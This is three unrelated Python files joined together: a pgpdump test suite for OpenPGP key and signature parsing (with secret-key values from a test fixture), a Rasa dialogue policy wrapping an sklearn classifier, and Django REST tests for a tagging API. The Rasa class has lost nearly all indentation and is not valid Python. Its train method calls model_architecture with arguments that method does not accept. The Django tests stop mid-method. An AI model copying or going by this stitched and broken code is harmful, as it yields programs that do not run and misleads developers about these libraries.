from pgpdump.packet import (TAG_TYPES, SignaturePacket, PublicKeyPacket,
PublicSubkeyPacket, UserIDPacket, old_tag_length, new_tag_length,
SecretKeyPacket, SecretSubkeyPacket)
from pgpdump.utils import (PgpdumpException, crc24, get_int8, get_mpi,
get_key_id, get_int_bytes, same_key)
class UtilsTestCase(TestCase):
    """Tests for the helper functions in pgpdump.utils."""

    def test_crc24(self):
        cases = [
            (0xb704ce, bytearray(b"")),
            (0x21cf02, bytearray(b"123456789")),
            (0xe84567, repeat(0, 1024 * 1024)),
        ]
        for want, data in cases:
            self.assertEqual(want, crc24(data))
        # Larger inputs verified once but too slow for every run:
        #self.assertEqual(0x03ebb7, crc24(repeat(0, 10 * 1024 * 1024)))
        #self.assertEqual(0x5c0542, crc24(repeat(0, 30 * 1024 * 1024)))

    # get_int2, get_int4 are tested plenty by actual code

    def test_int8(self):
        cases = [
            ([0x00] * 8, 0),
            ((0x00, 0x00, 0x00, 0x00, 0x0a, 0x0b, 0x0c, 0x0d), 0x0a0b0c0d),
            (bytearray(b'\x0a\x0b\x0c\x0d\x00\x00\x00\x00'),
                0x0a0b0c0d << 32),
        ]
        for raw, want in cases:
            self.assertEqual(want, get_int8(raw, 0))

    def test_mpi(self):
        cases = [
            ((0x00, 0x01, 0x01), 1, 3),
            ((0x00, 0x09, 0x01, 0xff), 511, 4),
            (bytearray(b'\x00\x11\x01\x00\x01'), 65537, 5),
        ]
        for raw, value, end_offset in cases:
            self.assertEqual((value, end_offset), get_mpi(raw, 0))

    def test_key_id(self):
        raw = b"\\.F\xa0\xf5:v\xed"
        self.assertEqual(b"5C2E46A0F53A76ED", get_key_id(raw, 0))

    def test_int_bytes(self):
        self.assertEqual(b"\x11", get_int_bytes(17))
        self.assertEqual(b"\x01\x00\x01", get_int_bytes(65537))

    def test_same_key(self):
        fprint = b"A5CA9D5515DC2CA73DF748CA5C2E46A0F53A76ED"
        key_id = b"5C2E46A0F53A76ED"
        short = b"F53A76ED"
        different = b"A5CA9D55"
        same = (fprint, key_id, short)
        # Any pair of identifiers derived from the same key must match.
        for left in same:
            for right in same:
                self.assertTrue(same_key(left, right))
        # A fragment of a different key must never match, either way round.
        for ident in same:
            self.assertFalse(same_key(ident, different))
        for ident in same:
            self.assertFalse(same_key(different, ident))
class Helper(object):
    """Mixin with shared verification helpers for the packet test cases."""

    def check_sig_packet(self, packet, length, version, typ,
            creation_time, key_id, pub_alg, hash_alg):
        '''Verify the common header fields of a signature packet in one
        call.'''
        pairs = [
            (2, packet.raw),
            (length, packet.length),
            (version, packet.sig_version),
            (typ, packet.raw_sig_type),
            (creation_time, packet.raw_creation_time),
            (key_id, packet.key_id),
            (pub_alg, packet.raw_pub_algorithm),
            (hash_alg, packet.raw_hash_algorithm),
        ]
        for want, got in pairs:
            self.assertEqual(want, got)
        # spot-check a few of the lazily computed human-readable fields
        if typ == 0x18:
            self.assertEqual("Subkey Binding Signature", packet.sig_type)
        if pub_alg == 17:
            self.assertEqual("DSA Digital Signature Algorithm",
                    packet.pub_algorithm)
        if hash_alg == 2:
            self.assertEqual("SHA1", packet.hash_algorithm)

    def load_data(self, filename):
        '''Read and return the raw bytes of a file under testdata/.'''
        full_path = os.path.join('testdata', filename)
        self.assertTrue(os.path.exists(full_path))
        with open(full_path, 'rb') as fileobj:
            return fileobj.read()

    # Here for 2.6 compatibility; these won't be used by 2.7 and up
    def assertIsNone(self, obj, msg=None):
        return self.assertTrue(obj is None, msg)

    def assertIsNotNone(self, obj, msg=None):
        return self.assertFalse(obj is None, msg)
class ParseTestCase(TestCase, Helper):
    """Parsing of raw signature data, including rejection of bad input."""

    def test_parse_empty(self):
        # None is rejected outright.
        self.assertRaises(PgpdumpException, BinaryData, None)

    def test_parse_short(self):
        # A single byte cannot hold a valid packet header.
        self.assertRaises(PgpdumpException, BinaryData, [0x00])

    def test_parse_invalid(self):
        # Leading 0x00 is not a recognizable packet header byte.
        self.assertRaises(PgpdumpException, BinaryData, [0x00, 0x00])

    def test_parse_single_sig_packet(self):
        # A lone detached DSA/SHA1 signature, decoded from base64.
        base64_sig = b"iEYEABECAAYFAk6A4a4ACgkQXC5GoPU6du1ATACgodGyQne3Rb7"\
                b"/eHBMRdau1KNSgZYAoLXRWt2G2wfp7haTBjJDFXMGsIMi"
        sig = base64.b64decode(base64_sig)
        data = BinaryData(sig)
        packets = list(data.packets())
        self.assertEqual(1, len(packets))
        sig_packet = packets[0]
        self.assertFalse(sig_packet.new)
        self.check_sig_packet(sig_packet, 70, 4, 0, 1317069230,
                b"5C2E46A0F53A76ED", 17, 2)
        self.assertEqual(2, len(sig_packet.subpackets))
        self.assertEqual(["Signature Creation Time", "Issuer"],
                [sp.name for sp in sig_packet.subpackets])

    def test_parse_ascii_sig_packet(self):
        # The same kind of signature, but in ASCII armor form.
        asc_data = b'''
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEABECAAYFAk6neOwACgkQXC5GoPU6du23AQCgghWjIFgBazXWIZNj4PGnkuYv
gMsAoLGOjudliDT9u0UqxN9KeJ22Jdne
=KYol
-----END PGP SIGNATURE-----'''
        data = AsciiData(asc_data)
        packets = list(data.packets())
        self.assertEqual(1, len(packets))
        sig_packet = packets[0]
        self.assertFalse(sig_packet.new)
        self.check_sig_packet(sig_packet, 70, 4, 0, 1319598316,
                b"5C2E46A0F53A76ED", 17, 2)
        self.assertEqual(2, len(sig_packet.subpackets))

    def test_parse_bad_crc(self):
        # Armor whose base64 body does not match the '=KYol' CRC24 trailer.
        asc_data = b'''
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEABECAAYFAk6neOwACgkQXC5GoPU6du23AQCgghWjIFgBazXWIZNj4PGnkuYv
gMsAoLGOjudliDT9u0UqxN9KeJ22JdnX
=KYol
-----END PGP SIGNATURE-----'''
        self.assertRaises(PgpdumpException, AsciiData, asc_data)
class ParseDataTestCase(TestCase, Helper):
    """End-to-end parsing of real keys and signatures from testdata/."""

    def test_parse_v3_sig(self):
        # An old version 3 signature: no subpackets, has the hash2 prefix.
        asc_data = b'''
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.18 (GNU/Linux)

iD8DBQBPWDfGXC5GoPU6du0RAq6XAKC3TejpiBsu3pGF37Q9Id/vPzoFlwCgtwXE
E/GGdt/Cn5Rr1G933H9nwxo=
=aJ6u
-----END PGP SIGNATURE-----'''
        data = AsciiData(asc_data)
        packets = list(data.packets())
        self.assertEqual(1, len(packets))
        sig_packet = packets[0]
        self.assertFalse(sig_packet.new)
        self.check_sig_packet(sig_packet, 63, 3, 0, 1331181510,
                b"5C2E46A0F53A76ED", 17, 2)
        self.assertEqual(b'\xae\x97', sig_packet.hash2)
        self.assertEqual(0, len(sig_packet.subpackets))

    def test_parse_ascii_clearsign(self):
        '''This is a clearsigned document with an expiring signature, so tests
        both the ignore pattern in AsciiData as well as additional signature
        subpackets.'''
        asc_data = self.load_data('README.asc')
        data = AsciiData(asc_data)
        packets = list(data.packets())
        self.assertEqual(1, len(packets))
        sig_packet = packets[0]
        self.assertFalse(sig_packet.new)
        self.assertEqual(3, len(sig_packet.subpackets))
        self.check_sig_packet(sig_packet, 76, 4, 1, 1332874080,
                b"5C2E46A0F53A76ED", 17, 2)
        # raw expires time is in seconds from creation date
        self.assertEqual(345600, sig_packet.raw_expiration_time)
        expires = datetime(2012, 3, 31, 18, 48, 00)
        self.assertEqual(expires, sig_packet.expiration_time)

    def test_parse_linus_binary(self):
        # Linus Torvalds' public key: RSA key + subkey, user ID, many sigs.
        rawdata = self.load_data('linus.gpg')
        data = BinaryData(rawdata)
        packets = list(data.packets())
        self.assertEqual(44, len(packets))
        seen = 0
        for packet in packets:
            # all 44 packets are of the known 'old' variety
            self.assertFalse(packet.new)
            if isinstance(packet, SignaturePacket):
                # a random signature plucked off the key
                if packet.key_id == b"E7BFC8EC95861109":
                    seen += 1
                    self.check_sig_packet(packet, 540, 4, 0x10, 1319560576,
                            b"E7BFC8EC95861109", 1, 8)
                    self.assertEqual(2, len(packet.subpackets))
                # a particularly dastardly sig- a ton of hashed sub parts,
                # this is the "positive certification packet"
                elif packet.key_id == b"79BE3E4300411886" and \
                        packet.raw_sig_type == 0x13:
                    seen += 1
                    self.check_sig_packet(packet, 312, 4, 0x13, 1316554898,
                            b"79BE3E4300411886", 1, 2)
                    self.assertEqual(8, len(packet.subpackets))
                # another sig from key above, the "subkey binding sig"
                elif packet.key_id == b"79BE3E4300411886" and \
                        packet.raw_sig_type == 0x18:
                    seen += 1
                    self.check_sig_packet(packet, 287, 4, 0x18, 1316554898,
                            b"79BE3E4300411886", 1, 2)
                    self.assertEqual(3, len(packet.subpackets))
            elif isinstance(packet, PublicSubkeyPacket):
                seen += 1
                self.assertEqual(4, packet.pubkey_version)
                self.assertEqual(1316554898, packet.raw_creation_time)
                self.assertEqual(1, packet.raw_pub_algorithm)
                self.assertIsNotNone(packet.modulus)
                self.assertEqual(2048, packet.modulus_bitlen)
                self.assertEqual(65537, packet.exponent)
                # only the low 8 hex digits of the fingerprint are pinned
                self.assertEqual(b"012F54CA", packet.fingerprint[32:])
            elif isinstance(packet, PublicKeyPacket):
                seen += 1
                self.assertEqual(4, packet.pubkey_version)
                self.assertEqual(1316554898, packet.raw_creation_time)
                self.assertEqual(1, packet.raw_pub_algorithm)
                self.assertEqual("RSA Encrypt or Sign", packet.pub_algorithm)
                self.assertIsNotNone(packet.modulus)
                self.assertEqual(2048, packet.modulus_bitlen)
                self.assertEqual(65537, packet.exponent)
                self.assertEqual(b"ABAF11C65A2970B130ABE3C479BE3E4300411886",
                        packet.fingerprint)
                self.assertEqual(b"79BE3E4300411886", packet.key_id)
            elif isinstance(packet, UserIDPacket):
                seen += 1
                self.assertEqual("Linus Torvalds", packet.user_name)
                self.assertEqual("torvalds@linux-foundation.org",
                        packet.user_email)
        # exactly six packets should have matched the branches above
        self.assertEqual(6, seen)

    def test_parse_linus_ascii(self):
        rawdata = self.load_data('linus.asc')
        data = AsciiData(rawdata)
        packets = list(data.packets())
        self.assertEqual(44, len(packets))
        # Note: we could do all the checks we did above in the binary version,
        # but this is really only trying to test the AsciiData extras, not the
        # full stack.

    def test_parse_dan(self):
        '''This key has DSA and ElGamal keys, which Linus' does not have.'''
        rawdata = self.load_data('dan.gpg')
        data = BinaryData(rawdata)
        packets = list(data.packets())
        self.assertEqual(9, len(packets))
        # 3 user ID packets
        self.assertEqual(3, sum(1 for p in packets if p.raw == 13))
        # 4 signature packets
        self.assertEqual(4, sum(1 for p in packets if p.raw == 2))
        seen = 0
        for packet in packets:
            self.assertFalse(packet.new)
            if isinstance(packet, PublicSubkeyPacket):
                seen += 1
                self.assertEqual(16, packet.raw_pub_algorithm)
                self.assertEqual("elg", packet.pub_algorithm_type)
                self.assertIsNotNone(packet.prime)
                self.assertIsNone(packet.group_order)
                self.assertIsNotNone(packet.group_gen)
                self.assertIsNotNone(packet.key_value)
                self.assertEqual(b"C3751D38", packet.fingerprint[32:])
            elif isinstance(packet, PublicKeyPacket):
                seen += 1
                self.assertEqual(17, packet.raw_pub_algorithm)
                self.assertEqual("dsa", packet.pub_algorithm_type)
                self.assertIsNotNone(packet.prime)
                self.assertIsNotNone(packet.group_order)
                self.assertIsNotNone(packet.group_gen)
                self.assertIsNotNone(packet.key_value)
                self.assertEqual(b"A5CA9D5515DC2CA73DF748CA5C2E46A0F53A76ED",
                        packet.fingerprint)
        self.assertEqual(2, seen)

    def test_parse_junio(self):
        '''This key has a single user attribute packet, which also uses the new
        size format on the outer packet, which is rare.'''
        rawdata = self.load_data('junio.gpg')
        data = BinaryData(rawdata)
        packets = list(data.packets())
        self.assertEqual(13, len(packets))
        # 4 user ID packets
        self.assertEqual(4, sum(1 for p in packets if p.raw == 13))
        # 6 signature packets
        self.assertEqual(6, sum(1 for p in packets if p.raw == 2))
        # 1 public subkey packet
        self.assertEqual(1, sum(1 for p in packets if p.raw == 14))
        # 1 user attribute packet
        self.assertEqual(1, sum(1 for p in packets if p.raw == 17))
        # check the user attribute packet
        ua_packet = [p for p in packets if p.raw == 17][0]
        self.assertEqual("jpeg", ua_packet.image_format)
        self.assertEqual(1513, len(ua_packet.image_data))

    def test_parse_v3_pubkeys(self):
        '''Two older version 3 public keys.'''
        rawdata = self.load_data('v3pubkeys.gpg')
        data = BinaryData(rawdata)
        packets = list(data.packets())
        self.assertEqual(2, len(packets))
        packet = packets[0]
        self.assertTrue(isinstance(packet, PublicKeyPacket))
        self.assertEqual(1, packet.raw_pub_algorithm)
        self.assertEqual("rsa", packet.pub_algorithm_type)
        self.assertEqual(944849149, packet.raw_creation_time)
        self.assertIsNone(packet.expiration_time)
        self.assertIsNotNone(packet.modulus)
        self.assertEqual(2048, packet.modulus_bitlen)
        self.assertIsNotNone(packet.exponent)
        self.assertEqual(b"3FC0BF6B", packet.key_id)
        # v3 fingerprints are MD5, hence only 32 hex digits
        self.assertEqual(b"7D263C88A1AB7737E31150CB4F3A211A",
                packet.fingerprint)
        packet = packets[1]
        self.assertTrue(isinstance(packet, PublicKeyPacket))
        self.assertEqual(1, packet.raw_pub_algorithm)
        self.assertEqual("rsa", packet.pub_algorithm_type)
        self.assertEqual(904151571, packet.raw_creation_time)
        self.assertIsNone(packet.expiration_time)
        self.assertIsNotNone(packet.modulus)
        self.assertEqual(1024, packet.modulus_bitlen)
        self.assertIsNotNone(packet.exponent)
        self.assertEqual(b"3DDE776D", packet.key_id)
        self.assertEqual(b"48A4F9F891F093019BC7FC532A3C5692",
                packet.fingerprint)

    def test_parse_v3_elgamal_pk(self):
        '''An older version 3 ElGamal public key with user ID and
        self-signature.'''
        rawdata = self.load_data('v3elgpk.asc')
        data = AsciiData(rawdata)
        packets = list(data.packets())
        self.assertEqual(3, len(packets))
        packet = packets[0]
        self.assertTrue(isinstance(packet, PublicKeyPacket))
        self.assertEqual(16, packet.raw_pub_algorithm)
        self.assertEqual("elg", packet.pub_algorithm_type)
        self.assertEqual(888716291, packet.raw_creation_time)
        self.assertIsNone(packet.expiration_time)
        # ElGamal keys have no RSA fields...
        self.assertIsNone(packet.modulus)
        self.assertIsNone(packet.modulus_bitlen)
        self.assertIsNone(packet.exponent)
        # ...but do carry a prime and group generator
        self.assertIsNotNone(packet.prime)
        self.assertIsNotNone(packet.group_gen)
        self.assertEqual(b"FF570A03", packet.key_id)
        self.assertEqual(b"7C4529FB11669ACA567BD53972000594",
                packet.fingerprint)
        self.assertTrue(isinstance(packets[1], UserIDPacket))
        packet = packets[2]
        self.assertTrue(isinstance(packet, SignaturePacket))
        self.assertEqual(16, packet.raw_pub_algorithm)
        self.assertEqual(888716292, packet.raw_creation_time)
class EncryptedPacketsTestCase(TestCase, Helper):
    """Tests around public-key encrypted session key messages."""

    def _load_session_key(self, filename):
        '''Parse an armored file, assert it holds exactly two packets, and
        return the first (the session key packet).'''
        packets = list(AsciiData(self.load_data(filename)).packets())
        self.assertEqual(2, len(packets))
        return packets[0]

    def test_parse_sessionkey_elg(self):
        '''This file contains a public key and message encrypted with an
        ElGamal Encrypt-Only key.'''
        session_key = self._load_session_key('sessionkey_elg.asc')
        self.assertEqual(3, session_key.session_key_version)
        self.assertEqual(b"B705D3A4C3751D38", session_key.key_id)
        self.assertEqual(16, session_key.raw_pub_algorithm)
        self.assertEqual("ElGamal Encrypt-Only", session_key.pub_algorithm)

    def test_parse_sessionkey_rsa(self):
        '''This file contains a public key and message encrypted with a RSA
        Encrypt or Sign key.'''
        session_key = self._load_session_key('sessionkey_rsa.asc')
        self.assertEqual(3, session_key.session_key_version)
        self.assertEqual(b"1C39A7BD114BFFA5", session_key.key_id)
        self.assertEqual(1, session_key.raw_pub_algorithm)
        self.assertEqual("RSA Encrypt or Sign", session_key.pub_algorithm)

    def test_parse_partial_length(self):
        '''This file contains an encrypted message with a Partial Body Length
        header; see http://tools.ietf.org/html/rfc4880#section-4.2.2.4
        '''
        raw = self.load_data('partial_length.gpg')
        parsed = list(BinaryData(raw).packets())
        self.assertEqual(2, len(parsed))
class PacketTestCase(TestCase):
    """Tests for tag lookup and old/new-style packet length decoding."""

    def test_lookup_type(self):
        self.assertEqual("Signature Packet", TAG_TYPES[2][0])

    def test_old_tag_length(self):
        # (input header bytes, expected (offset, length))
        cases = (
            ([0xb0, 0x02], (1, 2)),
            ([0x88, 0x46], (1, 70)),
            ([0x89, 0x01, 0x1c], (2, 284)),
            ([0xb9, 0x02, 0x0d], (2, 525)),
            ([0xb9, 0x04, 0x0d], (2, 1037)),
            (bytearray(b'\xb9\x04\x0d'), (2, 1037)),
            ([0xb9, 0x13, 0xff], (2, 5119)),
            ([0xba, 0x00, 0x01, 0x86, 0xa0], (4, 100000)),
        )
        for raw, want in cases:
            self.assertEqual(want, old_tag_length(raw, 0))

    def test_new_tag_length(self):
        # (input header bytes, expected (offset, length, partial flag))
        cases = (
            ([0x02], (1, 2, False)),
            ([0x10], (1, 16, False)),
            ([0x64], (1, 100, False)),
            ([0xa6], (1, 166, False)),
            ([0xa8], (1, 168, False)),
            ([0xc5, 0xfb], (2, 1723, False)),
            ([0xce, 0x93], (2, 3923, False)),
            ([0xd3, 0x3f], (2, 5119, False)),
            ([0xd8, 0x8c], (2, 6476, False)),
            ([0xed], (1, 8192, True)),
            ([0xff, 0x00, 0x00, 0x66, 0xc2], (5, 26306, False)),
            (bytearray(b'\xff\x00\x00\x66\xc2'), (5, 26306, False)),
            ([0xff, 0x00, 0x01, 0x86, 0xa0], (5, 100000, False)),
        )
        for raw, want in cases:
            self.assertEqual(want, new_tag_length(raw, 0))
class SecretKeyPacketTestCase(TestCase, Helper):
    """Parsing of secret key material in its various protection modes."""

    def test_parse_encrypted(self):
        # Passphrase-protected secret key: S2K fields set, no raw key values.
        rawdata = self.load_data('v4_secret_encrypted.gpg')
        data = BinaryData(rawdata)
        packets = list(data.packets())
        self.assertEqual(7, len(packets))
        subs_seen = 0
        for packet in packets:
            self.assertFalse(packet.new)
            if isinstance(packet, SecretSubkeyPacket):
                subs_seen += 1
                if subs_seen == 1:
                    # elg packet
                    self.assertEqual("elg", packet.pub_algorithm_type)
                    self.assertEqual(254, packet.s2k_id)
                    self.assertEqual("Iterated and Salted S2K", packet.s2k_type)
                    self.assertEqual(
                            bytearray(b"\x8d\x89\xbd\xdf\x01\x0e\x22\xcd"),
                            packet.s2k_iv)
                elif subs_seen == 2:
                    # rsa packet
                    self.assertEqual("rsa", packet.pub_algorithm_type)
                    self.assertEqual(254, packet.s2k_id)
                    self.assertEqual("Iterated and Salted S2K", packet.s2k_type)
                    self.assertEqual(
                            bytearray(b"\x09\x97\x6b\xf5\xd4\x28\x41\x1d"),
                            packet.s2k_iv)
            elif isinstance(packet, SecretKeyPacket):
                # the top-level DSA signing key
                self.assertEqual("dsa", packet.pub_algorithm_type)
                self.assertEqual(254, packet.s2k_id)
                self.assertEqual("Iterated and Salted S2K", packet.s2k_type)
                self.assertEqual("CAST5", packet.s2k_cipher)
                self.assertEqual("SHA1", packet.s2k_hash)
                self.assertEqual(
                        bytearray(b"\xc3\x87\xeb\xca\x9b\xce\xbc\x78"),
                        packet.s2k_iv)

    def test_parse_plain(self):
        '''The raw values below were extracted from the C version of pgpdump.
        The hex strings it outputs were converted to base 10 by running the
        following function over the hex strings:

        def to_int(x):
            return int(x.replace(' ', ''), 16)
        '''
        rawdata = self.load_data('v4_secret_plain.gpg')
        data = BinaryData(rawdata)
        packets = list(data.packets())
        self.assertEqual(7, len(packets))
        subs_seen = 0
        for packet in packets:
            self.assertFalse(packet.new)
            if isinstance(packet, SecretSubkeyPacket):
                subs_seen += 1
                if subs_seen == 1:
                    # elg packet: unprotected, so the secret exponent is visible
                    self.assertEqual("elg", packet.pub_algorithm_type)
                    self.assertEqual(0, packet.s2k_id)
                    self.assertEqual(None, packet.s2k_type)
                    self.assertEqual(None, packet.s2k_iv)
                    self.assertEqual(245799026332407193298181926223748572866928987611495184689013385965880161244176879821250061522687647728, packet.exponent_x)
                elif subs_seen == 2:
                    # rsa packet: all four private values are readable
                    self.assertEqual("rsa", packet.pub_algorithm_type)
                    self.assertEqual(0, packet.s2k_id)
                    self.assertEqual(None, packet.s2k_type)
                    self.assertEqual(None, packet.s2k_iv)
                    self.assertEqual(107429307998432888320715351604215972074903508478185926034856042440678824041847327442082101397552291647796540657257050768251344941490371163761048934745124363183224819621105784780195398083026664006729876758821509430352212953204518272377415915285011886868211417421097179985188014641310204357388385968166040278287, packet.multiplicative_inverse)
                    self.assertEqual(139930219416447408374822893460828502304441966752753468842648203646336195082149424690339775194932419616945814365656771053789999508162542355224095838373016952414720809190039261860912609841054241835835137530162417625471114503804567967161522096406622711734972153324109508774000862492521907132111400296639152885151, packet.prime_p)
                    self.assertEqual(141774976438365791329330227605232641244334061384594969589427240157587195987726021563323880620442249788289724672124037112182500862823754846020398652238714637523098123565121790819658975965315629614215592460191153065569430777288475743983312129144619017542854009503581558744199305796137178366407180728113362644607, packet.prime_q)
                    self.assertEqual(5830467418164177455383939797360032476940913805978768568081128075462505586965694225559897974113088818228809697270431492119090365699278285350171676334156873270109344274747057694689185206358606371235913423003163252354603704380371252575866102476793736443620998412227609599802054206292004785471167177881398711806191315950196087041018693839148033680564198494910540148825273531803832541184563811332315506727878483469747798396155096313345751606322830230368849084875744911041500024805242117661173352379509490605300753957220916597285056567409410296154792321206401452887335121085203916552891062930596871199021743741984622581173, packet.exponent_d)
            elif isinstance(packet, SecretKeyPacket):
                self.assertEqual("dsa", packet.pub_algorithm_type)
                self.assertEqual(254, packet.s2k_id)
                self.assertEqual("GnuPG S2K", packet.s2k_type)
                self.assertEqual("CAST5", packet.s2k_cipher)
                self.assertEqual("SHA1", packet.s2k_hash)
                self.assertEqual(None, packet.s2k_iv)

    def test_parse_mode_1002(self):
        # GnuPG "gnu-stub" mode 1002: key material lives on a smartcard.
        rawdata = self.load_data('secret_key_mode_1002.bin')
        data = BinaryData(rawdata)
        packets = list(data.packets())
        self.assertEqual(7, len(packets))
        for packet in packets:
            self.assertFalse(packet.new)
            if isinstance(packet, SecretKeyPacket):
                # this block matches both top-level and subkeys
                self.assertEqual("rsa", packet.pub_algorithm_type)
                self.assertEqual(255, packet.s2k_id)
                self.assertEqual("GnuPG S2K", packet.s2k_type)
                self.assertEqual("Plaintext or unencrypted", packet.s2k_cipher)
                self.assertEqual("Unknown", packet.s2k_hash)
                self.assertEqual(None, packet.s2k_iv)
# Allow the test module to be executed directly.
if __name__ == '__main__':
    main()
|
|
import typing
import json
import logging
import numpy as np
import os
import pickle
import warnings
from sklearn.base import clone
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import LabelEncoder
# noinspection PyProtectedMember
from sklearn.utils import shuffle as sklearn_shuffle
from typing import Optional, Any, List, Text, Dict, Callable
from rasa.core import utils
from rasa.core.domain import Domain
from rasa.core.featurizers import (
TrackerFeaturizer, MaxHistoryTrackerFeaturizer)
from rasa.core.policies.policy import Policy
from rasa.core.trackers import DialogueStateTracker
logger = logging.getLogger(__name__)
if typing.TYPE_CHECKING:
import sklearn
class SklearnPolicy(Policy):
"""Use an sklearn classifier to train a policy."""
def __init__(
self,
featurizer: Optional[MaxHistoryTrackerFeaturizer] = None,
priority: int = 1,
model: Optional['sklearn.base.BaseEstimator'] = None,
param_grid: Optional[Dict[Text, List] or List[Dict]] = None,
cv: Optional[int] = None,
scoring: Optional[Text or List or Dict or Callable] = 'accuracy',
label_encoder: LabelEncoder = LabelEncoder(),
shuffle: bool = True,
**kwargs: Any
) -> None:
"""Create a new sklearn policy.
Args:
featurizer: Featurizer used to convert the training data into
vector format.
model: The sklearn model or model pipeline.
param_grid: If *param_grid* is not None and *cv* is given,
a grid search on the given *param_grid* is performed
(e.g. *param_grid={'n_estimators': [50, 100]}*).
cv: If *cv* is not None, perform a cross validation on
the training data. *cv* should then conform to the
sklearn standard (e.g. *cv=5* for a 5-fold cross-validation).
scoring: Scoring strategy, using the sklearn standard.
label_encoder: Encoder for the labels. Must implement an
*inverse_transform* method.
shuffle: Whether to shuffle training data.
"""
if featurizer:
if not isinstance(featurizer, MaxHistoryTrackerFeaturizer):
raise TypeError("Passed featurizer of type {}, should be "
"MaxHistoryTrackerFeaturizer."
"".format(type(featurizer).__name__))
super(SklearnPolicy, self).__init__(featurizer, priority)
self.model = model or self._default_model()
self.cv = cv
self.param_grid = param_grid
self.scoring = scoring
self.label_encoder = label_encoder
self.shuffle = shuffle
# attributes that need to be restored after loading
self._pickle_params = [
'model', 'cv', 'param_grid', 'scoring', 'label_encoder']
self._train_params = kwargs
@staticmethod
def _default_model():
return LogisticRegression(solver="liblinear",
multi_class="auto")
@property
def _state(self):
return {attr: getattr(self, attr) for attr in self._pickle_params}
def model_architecture(self):
# filter out kwargs that cannot be passed to model
self._train_params = self._get_valid_params(self.model.__init__,
**self._train_params)
return self.model.set_params(**self._train_params)
def _extract_training_data(self, training_data):
# transform y from one-hot to num_classes
X, y = training_data.X, training_data.y.argmax(axis=-1)
if self.shuffle:
X, y = sklearn_shuffle(X, y)
return X, y
def _preprocess_data(self, X, y=None):
Xt = X.reshape(X.shape[0], -1)
if y is None:
return Xt
else:
yt = self.label_encoder.transform(y)
return Xt, yt
def _search_and_score(self, model, X, y, param_grid):
search = GridSearchCV(
model,
param_grid=param_grid,
cv=self.cv,
scoring='accuracy',
verbose=1,
)
search.fit(X, y)
print("Best params:", search.best_params_)
return search.best_estimator_, search.best_score_
    def train(self,
              training_trackers: List[DialogueStateTracker],
              domain: Domain,
              **kwargs: Any
              ) -> None:
        """Fit the sklearn model on the featurized training trackers.

        Either fits the model directly, or — when ``self.cv`` is set —
        runs a cross-validated grid search over ``self.param_grid``.
        """
        training_data = self.featurize_for_training(training_trackers,
                                                    domain,
                                                    **kwargs)
        # X: state features; y: action class indices (one-hot collapsed)
        X, y = self._extract_training_data(training_data)
        model = self.model_architecture(**kwargs)
        score = None
        # Note: clone is called throughout to avoid mutating default
        # arguments.
        self.label_encoder = clone(self.label_encoder).fit(y)
        Xt, yt = self._preprocess_data(X, y)
        if self.cv is None:
            model = clone(model).fit(Xt, yt)
        else:
            # empty grid still runs a plain cross-validated fit
            param_grid = self.param_grid or {}
            model, score = self._search_and_score(
                model, Xt, yt, param_grid)
        self.model = model
        logger.info("Done fitting sklearn policy model")
        if score is not None:
            logger.info("Cross validation score: {:.5f}".format(score))
def _postprocess_prediction(self, y_proba, domain):
yp = y_proba[0].tolist()
# Some classes might not be part of the training labels. Since
# sklearn does not predict labels it has never encountered
# during training, it is necessary to insert missing classes.
indices = self.label_encoder.inverse_transform(np.arange(len(yp)))
y_filled = [0.0 for _ in range(domain.num_actions)]
for i, pred in zip(indices, yp):
y_filled[i] = pred
return y_filled
def predict_action_probabilities(self,
tracker: DialogueStateTracker,
domain: Domain) -> List[float]:
X = self.featurizer.create_X([tracker], domain)
Xt = self._preprocess_data(X)
y_proba = self.model.predict_proba(Xt)
return self._postprocess_prediction(y_proba, domain)
def persist(self, path: Text) -> None:
if self.model:
self.featurizer.persist(path)
meta = {"priority": self.priority}
meta_file = os.path.join(path, 'sklearn_policy.json')
utils.dump_obj_as_json_to_file(meta_file, meta)
filename = os.path.join(path, 'sklearn_model.pkl')
with open(filename, 'wb') as f:
pickle.dump(self._state, f)
else:
warnings.warn("Persist called without a trained model present. "
"Nothing to persist then!")
@classmethod
def load(cls, path: Text) -> Policy:
filename = os.path.join(path, 'sklearn_model.pkl')
if not os.path.exists(path):
raise OSError("Failed to load dialogue model. Path {} "
"doesn't exist".format(os.path.abspath(filename)))
featurizer = TrackerFeaturizer.load(path)
assert isinstance(featurizer, MaxHistoryTrackerFeaturizer), \
("Loaded featurizer of type {}, should be "
"MaxHistoryTrackerFeaturizer.".format(type(featurizer).__name__))
meta_file = os.path.join(path, "sklearn_policy.json")
meta = json.loads(utils.read_file(meta_file))
policy = cls(featurizer=featurizer, priority=meta["priority"])
with open(filename, 'rb') as f:
state = pickle.load(f)
vars(policy).update(state)
logger.info("Loaded sklearn model")
return policy
|
|
from urllib.parse import quote
from django.test.testcases import TestCase
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.contenttypes.models import ContentType
from rest_framework.test import APIClient
from generic_tagging.tests.factories import TagFactory, TaggedItemFactory, UserFactory, \
TagTestArticle0Factory, TagTestArticle1Factory
from generic_tagging.models import Tag, TaggedItem
from generic_tagging.tests.models import TagTestArticle0
from generic_tagging.tests.compatibility import patch
class TagViewSetTestCase(TestCase):
    """API tests for the tag viewset: list/retrieve/create/delete are
    allowed, updating an existing tag is not."""

    def setUp(self):
        labels = ['aaa 0', 'bbb 1', 'ccc 2']
        self.tags = [TagFactory(label=label) for label in labels]
        self.client = APIClient()

    @staticmethod
    def _dict_for_tag(tag):
        # expected serialized representation of a single tag
        return {'id': tag.pk,
                'label': tag.label,
                'url': '/%s/' % quote(tag.label)}

    def test_list(self):
        response = self.client.get('/api/tags/')
        self.assertEqual(response.status_code, 200)
        expected = [self._dict_for_tag(tag) for tag in self.tags]
        self.assertEqual(response.data, expected)

    def test_retrieve(self):
        tag = self.tags[0]
        response = self.client.get('/api/tags/{}/'.format(tag.pk))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.data, self._dict_for_tag(tag))

    def test_create(self):
        self.assertRaises(ObjectDoesNotExist, Tag.objects.get, label='new label')
        response = self.client.post('/api/tags/', {'label': 'new label'}, format='json')
        self.assertEqual(response.status_code, 201)
        self.assertIsNotNone(Tag.objects.get(label='new label'))

    def test_delete(self):
        tag = TagFactory()
        count_before = Tag.objects.count()
        response = self.client.delete('/api/tags/%d/' % tag.pk)
